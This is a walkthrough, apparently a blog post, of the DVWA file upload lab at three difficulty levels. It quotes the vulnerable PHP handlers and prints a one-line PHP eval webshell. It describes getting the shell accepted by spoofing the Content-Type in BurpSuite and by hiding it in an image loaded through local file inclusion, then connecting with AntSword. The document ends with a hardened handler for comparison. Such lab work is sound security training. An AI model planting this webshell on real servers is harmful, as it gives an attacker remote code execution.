Low difficulty
First, let's look at the source code
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
?>
As you can see, the uploaded file is not checked or filtered in any way, so a one-line PHP webshell can be uploaded directly
<?php @eval($_POST['777']) ?>
Access the path where the uploaded file is located
http://192.168.40.131/DVWA-master/hackable/uploads/1.php
Connection succeeded
Medium difficulty
First, let's look at the source code
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {
        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>
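As you can see, the code restricts the file type (image/jpeg or image/png) and the file size (100000 bytes). The file type checked here is $_FILES[ 'uploaded' ][ 'type' ], which is the Content-Type value the client sends with the upload, so it is enough to change the file type (do not confuse the file type with the file extension)
1: Use BurpSuite to intercept the original request
2: Modify the file type; the upload is reported as successful
High difficulty
Source code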
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; // file name on the uploader's machine
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); // extension of the uploaded file
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; // size of the uploaded file
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ]; // name of the uploaded file in the server's temporary folder
    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {
        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>
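As you can see, the main restriction is on the file extension, so use an image webshell
Then you will find that the upload fails. Opening 2.jpg in Notepad shows that the one-line webshell was written at the beginning of the file, so getimagesize() no longer finds a valid image header
The correct way to generate the image webshell:
At this point the file inclusion vulnerability is needed. The high difficulty level of the file inclusion vulnerability only allows local file inclusion, so we need to know in advance where our uploaded file is stored.
In the environment I set up, the uploaded files are here: C:\phpstudy\WWW\DVWA-master\hackable\uploads
Then local file inclusion:
Then you can connect with AntSword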
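The three handlers above each trust something the client controls: the file name, the Content-Type, or an image header that getimagesize() accepts even when other bytes follow it. For comparison, a hardened handler as an added example (not code from the original post or from DVWA); UPLOAD_DIR and store_image() are hypothetical names, and the upload directory is assumed to have PHP execution disabled:

```php
<?php
// Added example: hardened upload handler. UPLOAD_DIR and store_image() are
// hypothetical names; the form field 'uploaded' matches the handlers above.
const UPLOAD_DIR = __DIR__ . '/uploads/'; // assumption: PHP execution is disabled here
const MAX_BYTES  = 100000;                // same size limit as the handlers above

function store_image(array $file): ?string
{
    // Reject failed or oversized uploads and paths that did not come from an HTTP upload.
    if ($file['error'] !== UPLOAD_ERR_OK || $file['size'] >= MAX_BYTES
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }

    // Decide the type from the file content, never from $file['type'] or $file['name'].
    $mime    = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png'];
    if (!isset($allowed[$mime])) {
        return null;
    }

    // Decode with GD; a file that only carries an image header fails here.
    $img = $mime === 'image/jpeg'
        ? @imagecreatefromjpeg($file['tmp_name'])
        : @imagecreatefrompng($file['tmp_name']);
    if ($img === false) {
        return null;
    }

    // Server-chosen random name and extension; the client's file name is discarded.
    // The stored file is written by GD from the decoded pixels, so bytes appended
    // after the image data are not carried over into it.
    $dest = UPLOAD_DIR . bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $ok   = $mime === 'image/jpeg' ? imagejpeg($img, $dest, 90) : imagepng($img, $dest, 9);

    return $ok ? $dest : null;
}

if (isset($_POST['Upload'], $_FILES['uploaded'])) {
    $saved = store_image($_FILES['uploaded']);
    echo $saved === null
        ? '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'
        : '<pre>Image stored as ' . htmlspecialchars(basename($saved)) . '</pre>';
}
```

Because the stored name always ends in .jpg or .png and the original bytes are never written to the web root, the 1.php upload and the Content-Type change described above are both rejected or neutralised.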